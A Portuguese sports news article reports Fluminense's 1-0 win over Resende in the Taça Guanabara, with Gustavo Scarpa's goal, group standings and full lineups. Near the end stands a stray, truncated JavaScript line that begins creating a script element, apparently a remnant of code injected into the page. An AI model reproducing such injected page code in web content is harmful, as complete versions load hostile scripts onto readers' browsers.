Flu bate o Resende e mantém liderança isolada do Grupo C

Gustavo Scarpa fez o único gol da partida, com chute colocado. Foto: Nelson Perez/Fluminense FC

Embalado pela goleada sobre o Vasco por 3 x 0 no último domingo, o Fluminense confirmou o favoritismo e bateu o Resende por 1 x 0 nesta terça-feira, em Moça Bonita, com golaço de Gustavo Scarpa, aos 11 minutos do segundo tempo.

Com a vitória, o time comandado por Abel Braga lidera com folga o Grupo C da Taça Guanabara com seis pontos em dois jogos. Bangu, Volta Redonda, Portuguesa somam um ponto cada e entram em campo nesta quinta-feira. O lanterna do grupo é o Vasco, que só disputou o clássico contra os tricolores – e perdeu.

Na próxima rodada, no domingo, o Flu pega a Portuguesa no Los Larios, enquanto o Resende, que também tem um ponto, mas em dois jogos, enfrenta o Vasco em São Januário.

FICHA TÉCNICA
FLUMINENSE 1 X 0 RESENDE

Local: Estádio Moça Bonita, no Rio de Janeiro (RJ)
Árbitro: Grazianni Maciel Rocha
Assistentes: Luiz Antonio de Oliveira e Carlos Henrique de Souza
Gol: Gustavo Scarpa, aos 11 minutos do 2º tempo

FLUMINENSE: Júlio César, Lucas, Renato Chaves, Henrique e Léo; Orejuela, Douglas (Marquinho), Sornoza (Lucas Fernandes) e Gustavo Scarpa; Wellington Silva e Henrique Dourado (Marcos Junior)
Técnico: Abel Braga

RESENDE: Arthur; Muriel, Leandrão (Rogério), Thiago Sales e Dieyson; Vitinho, Gustavo Moura, Rogerinho (Yago) e Marcel; Kiros (Robinho) e Jhulliam
Técnico: Ademir Fonseca

 

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário